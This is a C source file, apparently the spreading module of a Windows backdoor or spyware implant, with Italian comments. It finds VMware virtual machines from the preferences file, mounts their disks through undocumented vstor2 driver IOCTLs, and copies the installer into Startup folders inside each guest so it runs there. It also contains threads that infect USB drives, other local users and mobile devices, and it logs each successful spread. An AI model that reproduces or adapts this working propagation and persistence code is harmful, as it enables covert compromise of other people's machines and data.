struct _ioctl_dismount
{
unsigned short len;
unsigned short dummy0;
unsigned long dw1;
unsigned long dw2;
unsigned long dw3;
unsigned long dw4;
unsigned long VolumeID;
unsigned long dw6;
};
extern WCHAR *UTF8_2_UTF16(char *str);
// Cerca una drive letter libera
char *FindFreeDriveLetter()
{
static char drive_letter[4];
drive_letter[1] = ':';
drive_letter[2] = '\\';
drive_letter[3] = NULL;
// XXX - Per ora riesce a montarlo solo su Z
drive_letter[0] = 'Z';
return drive_letter;
/* for (drive_letter[0]='E'; drive_letter[0]<='Z'; drive_letter[0]++)
if (GetDriveType(drive_letter) == DRIVE_NO_ROOT_DIR)
return drive_letter;
return NULL;*/
}
BOOL StartVMService()
{
DWORD len;
HKEY hKey;
char service_path[MAX_PATH];
STARTUPINFO si;
PROCESS_INFORMATION pi;
// Verifica che non sia gia' startato per conto suo
if (HM_FindPid("vixDiskMountServer.exe", FALSE))
return TRUE;
if(FNC(RegOpenKeyExA)(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\vmplayer.exe", 0, KEY_READ, &hKey) != ERROR_SUCCESS)
return FALSE;
len = sizeof(service_path);
if(FNC(RegQueryValueExA)(hKey, "Path", NULL, NULL, (LPBYTE)service_path, &len) != ERROR_SUCCESS) {
RegCloseKey(hKey);
return FALSE;
}
RegCloseKey(hKey);
_snprintf_s(service_path, sizeof(service_path), _TRUNCATE, "%s\\vixDiskMountServer.exe", service_path);
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW;
HM_CreateProcess((char *)service_path, 0, &si, &pi, 0);
if (!pi.dwProcessId)
return FALSE;
Sleep(1000); // Gli da' del tempo per inizializzarsi...
return TRUE;
}
// Dato il path, torna il voulme id
#define MAX_VOLUME_ID_LEN 16
DWORD FindDiskID(HANDLE hfile, char *disk_path)
{
DWORD dummy;
char reply[0x3FDC];
char string_match[MAX_PATH*2];
char *ptr;
DWORD disk_id = 0;
DWORD i;
BYTE msg[20] = { 0x14, 0x00, 0x00, 0x00, 0xd0, 0x94, 0x57, 0x04, 0xba, 0xab, 0x00 ,0x00, 0x00, 0x00, 0x6d, 0x64, 0x04, 0x00, 0x00, 0x00};
if (!DeviceIoControl(hfile, 0x2a002c, &msg, sizeof(msg), reply, sizeof(reply), &dummy, NULL))
return 0;
_snprintf_s(string_match, sizeof(string_match), " type=disk_volume file=\"%s\"", disk_path);
if (! (ptr = (char *)memmem(reply, sizeof(reply), string_match, strlen(string_match))) )
return 0;
*ptr = 0;
for (i=0; i<MAX_VOLUME_ID_LEN; i++, ptr--) {
if (*ptr == '=') {
ptr++;
disk_id = atoi(ptr);
return disk_id;
}
}
return 0;
}
BOOL FindVStoreDevice(WCHAR *dev_store)
{
DWORD dummy;
LPVOID *drivers;
DWORD cbNeeded = 0;
int cDrivers, i;
FNC(EnumDeviceDrivers)((LPVOID *)&dummy, sizeof(dummy), &cbNeeded);
if (cbNeeded == 0)
return FALSE;
if (!(drivers = (LPVOID *)malloc(cbNeeded)))
return FALSE;
if( FNC(EnumDeviceDrivers)(drivers, cbNeeded, &dummy) ) {
WCHAR szDriver[1024];
cDrivers = cbNeeded/sizeof(LPVOID);
for (i=0; i < cDrivers; i++ ) {
if(FNC(GetDeviceDriverBaseNameW)(drivers[i], szDriver, sizeof(szDriver)/sizeof(szDriver[0]))) {
if (!_wcsnicmp(szDriver, L"vstor2-", wcslen(L"vstor2-"))) {
WCHAR *ptr;
if(ptr = wcschr(szDriver, L'.')) {
*ptr = 0;
_snwprintf_s(dev_store, MAX_PATH, _TRUNCATE, L"\\\\.\\%s", szDriver);
free(drivers);
return TRUE;
}
free(drivers);
return FALSE;
}
}
}
}
free(drivers);
return FALSE;
}
// Monta un disco virtuale
BOOL MountVMDisk(char *disk_path, char *drive_letter, DWORD *volume_id)
{
HANDLE hfile;
char reply[0x3FDC];
WCHAR vstore[MAX_PATH];
_ioctl_vstor msg;
DWORD dummy;
// Al primo tentativo di mount starta il servizio
if (!StartVMService())
return FALSE;
// Costruisce il messaggio
ZeroMemory(&msg, sizeof(msg));
msg.len = sizeof(struct _ioctl_vstor);
msg.dw1 = 0x045cdcc8; //C8 DC 5C 04
msg.dw2 = 0x0000abba;
msg.dw3 = 0x00000000;
msg.dw4 = 0x00000002;
msg.dw5 = 0x00000000;
msg.dw6 = 0x02000000;
strcpy((char *) msg.Path, disk_path);
// Manda la ioctl per montare il disco
if (!FindVStoreDevice(vstore))
return FALSE;
hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return FALSE;
if (!DeviceIoControl(hfile, 0x2a002c, &msg, sizeof(msg), reply, sizeof(reply), &dummy, NULL)) {
CloseHandle(hfile);
return FALSE;
}
*volume_id = FindDiskID(hfile, disk_path);
CloseHandle(hfile);
return TRUE;
}
// Smonta un disco virtuale
BOOL UnmountVMDisk(char *disk_path, DWORD volume_id)
{
HANDLE hfile;
char reply[0x3FDC];
WCHAR vstore[MAX_PATH];
_ioctl_dismount msg;
DWORD dummy;
// Costruisce il messaggio
ZeroMemory(&msg, sizeof(msg));
msg.len = sizeof(msg);
msg.dw2 = 0x0000abba;
msg.dw3 &= 0xffff0000;
msg.dw4 = 0x3;
msg.VolumeID = volume_id;
msg.dw6 = 0x01;
// Manda la ioctl per smontare il disco
if (!FindVStoreDevice(vstore))
return FALSE;
hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return FALSE;
if (!DeviceIoControl(hfile, 0x2a002c, &msg, sizeof(msg), reply, sizeof(reply), &dummy, NULL)) {
CloseHandle(hfile);
return FALSE;
}
CloseHandle(hfile);
return TRUE;
}
// Copia i file del dropper sul path specificato nelle potenziali directory di autorun
BOOL InfectVMDisk(char *drive_letter, char *exe_name)
{
char win7_path[MAX_PATH];
char xp_path[MAX_PATH];
char s_path[MAX_PATH];
HANDLE hfile;
_snprintf_s(win7_path, MAX_PATH, _TRUNCATE, "%sProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\%s.exe", drive_letter, exe_name);
_snprintf_s(xp_path, MAX_PATH, _TRUNCATE, "%sDocuments and Settings\\All Users\\Start Menu\\Programs\\Startup\\%s.exe", drive_letter, exe_name);
HM_CompletePath(exe_name, s_path);
// Se c'e' uno dei due file, vuol dire che e' gia' infetto
hfile = CreateFile(win7_path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile != INVALID_HANDLE_VALUE) {
CloseHandle(hfile);
return FALSE;
}
hfile = CreateFile(xp_path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile != INVALID_HANDLE_VALUE) {
CloseHandle(hfile);
return FALSE;
}
// Cerca prima di copiare il path win7, perche' su alcuni win7 potrebbe esserci anche l'altro (che pero' e' inattivo)
// Su XP invece di sicuro non c'e' il path di win7
if (FNC(CopyFileA)(s_path, win7_path, TRUE))
return TRUE;
if (FNC(CopyFileA)(s_path, xp_path, TRUE))
return TRUE;
return FALSE;
}
// Monta e infetta un dato disco virtuale
void InfectVMWare(char *disk_path)
{
char *drive_letter;
DWORD volume_id = 0;
WCHAR msg[MAX_PATH*2];
if (! (drive_letter = FindFreeDriveLetter()) )
return;
if (!MountVMDisk(disk_path, drive_letter, &volume_id))
return;
if (InfectVMDisk(drive_letter, EXE_INSTALLER_NAME)) {
REPORT_STATUS_LOG("- VMWare Installation...........OK\r\n");
_snwprintf_s(msg, sizeof(msg)/sizeof(WCHAR), _TRUNCATE, L"[Inf. Module]: Spread to VMWare %S", disk_path);
SendStatusLog(msg);
}
// Se non e' riuscito a recuperare l'id del volume prova a smontarli tutti
if (volume_id == 0) {
for (int i=100; i<256; i++)
UnmountVMDisk(drive_letter, i);
} else
UnmountVMDisk(drive_letter, volume_id);
}
// Cerca tutti i dischi delle vmware preferite
void FindVMDisk(char *conf_path)
{
HANDLE hFile;
HANDLE hMap;
DWORD config_size;
char *config_map, *ptr, *ptr_end;
char *local_config_map;
char disk_path[MAX_PATH];
WCHAR *w_path;
// Mappa in memoria il file di config
w_path = UTF8_2_UTF16(conf_path);
if (!w_path)
return;
if ((hFile = FNC(CreateFileW)(w_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE)
return;
SAFE_FREE(w_path);
config_size = GetFileSize(hFile, NULL);
if (config_size == INVALID_FILE_SIZE) {
CloseHandle(hFile);
return;
}
local_config_map = (char *)calloc(config_size + 1, sizeof(char));
if (local_config_map == NULL) {
CloseHandle(hFile);
return;
}
if ((hMap = FNC(CreateFileMappingA)(hFile, NULL, PAGE_READONLY, 0, 0, NULL)) == INVALID_HANDLE_VALUE) {
SAFE_FREE(local_config_map);
CloseHandle(hFile);
return;
}
if ( (config_map = (char *)FNC(MapViewOfFile)(hMap, FILE_MAP_READ, 0, 0, 0)) ) {
memcpy(local_config_map, config_map, config_size);
FNC(UnmapViewOfFile)(config_map);
if (ptr = strstr(local_config_map, ".vmdk\"")) {
ptr_end = ptr + strlen(".vmdk");
*ptr_end = NULL;
for(;*ptr!='"' && ptr!=local_config_map; ptr--);
if (*ptr == '"') {
ptr++;
sprintf_s(disk_path, conf_path);
ptr_end = strrchr(disk_path, '\\');
if (ptr_end) {
ptr_end++;
*ptr_end = NULL;
strcat_s(disk_path, ptr);
// Infetta il disco virtuale specificato
InfectVMWare(disk_path);
}
}
}
}
SAFE_FREE(local_config_map);
CloseHandle(hMap);
CloseHandle(hFile);
}
// Cerca VMWare se installato sul sistema (in ultima istanza infetta anche tutte le VM...)
void FindAndInfectVMware()
{
WCHAR config_path[MAX_PATH];
HANDLE hFile;
HANDLE hMap;
DWORD config_size, i;
char *config_map, *ptr, *ptr_end;
char *local_config_map;
char obj_string[MAX_PATH];
// Verifica che esista il file della backdoor
HM_CompletePath(EXE_INSTALLER_NAME, obj_string);
hFile = CreateFile(obj_string, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
if (hFile == INVALID_HANDLE_VALUE)
return;
CloseHandle(hFile);
// Mappa in memoria il file di config
if (GetEnvironmentVariableW(L"appdata", config_path, MAX_PATH) == 0)
return;
wcscat_s(config_path, MAX_PATH, L"\\VMware\\preferences.ini");
if ((hFile = FNC(CreateFileW)(config_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE)
return;
config_size = GetFileSize(hFile, NULL);
if (config_size == INVALID_FILE_SIZE) {
CloseHandle(hFile);
return;
}
local_config_map = (char *)calloc(config_size + 1, sizeof(char));
if (local_config_map == NULL) {
CloseHandle(hFile);
return;
}
if ((hMap = FNC(CreateFileMappingA)(hFile, NULL, PAGE_READONLY, 0, 0, NULL)) == INVALID_HANDLE_VALUE) {
SAFE_FREE(local_config_map);
CloseHandle(hFile);
return;
}
if ( (config_map = (char *)FNC(MapViewOfFile)(hMap, FILE_MAP_READ, 0, 0, 0)) ) {
memcpy(local_config_map, config_map, config_size);
FNC(UnmapViewOfFile)(config_map);
// Parsa per cercare i vmx
ptr_end = local_config_map;
while (ptr = strstr(ptr_end, ".vmx\"")) {
ptr_end = ptr + strlen(".vmx");
*ptr_end = NULL;
for(;*ptr!='"' && ptr!=local_config_map; ptr--);
if (*ptr == '"') {
ptr++;
// Per ogni macchina trovata, cerca il disco virtuale corrispondente
FindVMDisk(ptr);
}
*ptr_end = '"';
}
}
SAFE_FREE(local_config_map);
CloseHandle(hMap);
CloseHandle(hFile);
}
///////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////
DWORD WINAPI MonitorNewUsersThread(DWORD dummy)
{
LOOP {
if (infection_spread) {
SetLoadKeyPrivs();
InfectUsers();
}
CANCELLATION_SLEEP(bPM_sprcp, SPREAD_AGENT_SLEEP_TIME);
}
return 0;
}
//#define FAKE_MOBILE_INFECTION 1
DWORD WINAPI MonitorPDAThread(DWORD dummy)
{
#ifndef FAKE_MOBILE_INFECTION
LOOP {
char bb_path[MAX_PATH];
//WCHAR mmc_path[MAX_PATH];
CANCELLATION_SLEEP(bPM_pdacp, PDA_AGENT_SLEEP_TIME);
/*if (infection_pda && PDAFilesPresent() && RapiInit() && TryRapiConnect(3000)) {
if (FindMemoryCard(mmc_path, MAX_PATH) && !IsPDAInfected(mmc_path)) {
if (InfectPDA(mmc_path)) {
REPORT_STATUS_LOG("- WM SmartPhone Installation....OK\r\n");
SendStatusLog(L"[Inf. Module]: Spread to Mobile Device");
}
}
RapiDisconnect();
CANCELLATION_SLEEP(bPM_pdacp, PDA_AGENT_SLEEP_TIME*2);
}*/
/*if (infection_pda && BBFilesPresent() && HM_FindPid("Rim.Desktop.exe", FALSE)) {
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &pi, sizeof(pi) );
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW;
HM_CreateProcess(HM_CompletePath(BB_INSTALL_NAME1, bb_path), 0, &si, &pi, 0);
if (pi.dwProcessId)
SM_AddExecutedProcess(pi.dwProcessId);
}*/
}
return 0;
#else
static BOOL first_time = TRUE;
LOOP {
if (first_time && infection_pda && RapiInit() && TryRapiConnect(3000)) {
first_time = FALSE;
REPORT_STATUS_LOG("- WM SmartPhone Installation....OK\r\n");
SendStatusLog(L"[Inf. Module]: Spread to Mobile Device");
RapiDisconnect();
}
CANCELLATION_SLEEP(bPM_pdacp, 2500);
}
return 0;
#endif
}
DWORD WINAPI MonitorUSBThread(DWORD dummy)
{
WCHAR drive_letter[4];
DWORD type;
drive_letter[1]=L':';
drive_letter[2]=L'\\';
drive_letter[3]=0;
LOOP {
if (infection_usb) {
for (drive_letter[0]=L'D'; drive_letter[0]<=L'Z'; drive_letter[0]++) {
type = FNC(GetDriveTypeW)(drive_letter);
if (type==DRIVE_REMOVABLE && !IsUSBInfected(drive_letter) && InfectUSB(drive_letter, EXE_INSTALLER_NAME)) {
REPORT_STATUS_LOG("- USB Drive Installation........OK\r\n");
SendStatusLog(L"[Inf. Module]: Spread to USB Drive");
}
}
}
CANCELLATION_SLEEP(bPM_usbcp, USB_AGENT_SLEEP_TIME);
}
return 0;
}
DWORD WINAPI MonitorVMThread(DWORD dummy)
{
LOOP {
if (infection_vm)
FindAndInfectVMware();
CANCELLATION_SLEEP(bPM_vmwcp, vm_delay);
}
return 0;
}
DWORD __stdcall PM_PDAAgentStartStop(BOOL bStartFlag, BOOL bReset)
{
DWORD dummy;
// Durante la sync non lo stoppa (dato che non produce log)
if (!bReset)
return 0;
// Se l'agent e' gia' nella condizione desiderata
// non fa nulla.
if (bPM_PDAAgentStarted == bStartFlag)
return 0;
bPM_PDAAgentStarted = bStartFlag;
if (bStartFlag) {
hPDAThread = HM_SafeCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorPDAThread, NULL, 0, &dummy);
/*hSpreadThread = HM_SafeCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorNewUsersThread, NULL, 0, &dummy);
hUSBThread = HM_SafeCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorUSBThread, NULL, 0, &dummy);
hVMWThread = HM_SafeCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorVMThread, NULL, 0, &dummy);*/
} else {
QUERY_CANCELLATION(hPDAThread, bPM_pdacp);
/*QUERY_CANCELLATION(hSpreadThread, bPM_sprcp);
QUERY_CANCELLATION(hUSBThread, bPM_usbcp);
QUERY_CANCELLATION(hVMWThread, bPM_vmwcp);*/
}
return 1;
}
DWORD __stdcall PM_PDAAgentInit(JSONObject elem)
{
//DWORD temp;
//infection_spread = (BOOL) elem[L"local"]->AsBool();
infection_pda = (BOOL) elem[L"mobile"]->AsBool();
//infection_usb = (BOOL) elem[L"usb"]->AsBool();
/* temp = (DWORD) elem[L"vm"]->AsNumber();
if (temp!=0) {
infection_vm = TRUE;
vm_delay = temp * 1000;
} else
infection_vm = FALSE;*/
return 1;
}
void PM_PDAAgentRegister()
{
AM_MonitorRegister(L"infection", PM_PDAAGENT, NULL, (BYTE *)PM_PDAAgentStartStop, (BYTE *)PM_PDAAgentInit, NULL);
}